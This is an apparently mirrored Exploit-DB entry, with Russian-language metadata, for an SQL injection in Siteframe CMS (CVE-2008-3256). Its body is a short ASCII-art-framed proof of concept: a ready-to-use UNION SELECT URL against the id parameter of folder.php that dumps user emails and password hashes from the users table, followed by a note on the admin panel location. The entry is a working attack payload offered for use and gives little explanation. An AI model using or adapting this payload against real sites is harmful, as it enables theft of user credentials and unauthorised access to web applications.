- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6099
- Проверка EDB
-
- Пройдено
- Автор
- N0NE
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-3256
- Дата публикации
- 2008-07-18
Код:
#################################################
#################################################
##SQL-Injection in Siteframe CMS (all versions)##
#################################################
#################################################
##############
#Author: n0ne##############
#E-Mail: [email protected]#
###########################
###############################
#Vulnerable script: folder.php#
#Vulnerable var: id############
####################
########################################
#CMS Homepage: http://www.siteframe.org#
########################################
##########################################################################################################################################################
#Exploit PoC: #http://www.target.com/folder.php?id=370+and(1=2)+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user_email,user_passwd),10,11# #+from+users--# ########################################################################################################################
##########################################################################################################################################################
#########################################################################################################
#Admin panel: http://www.target.com/admin/ (but previously you gotta log in as administrator on website)#
#########################################################################################################
###################################################
#############Greetz to www.antichat.ru#############
############And personally to Nilson ;)############
###################################################
# milw0rm.com [2008-07-18]- Источник
- www.exploit-db.com
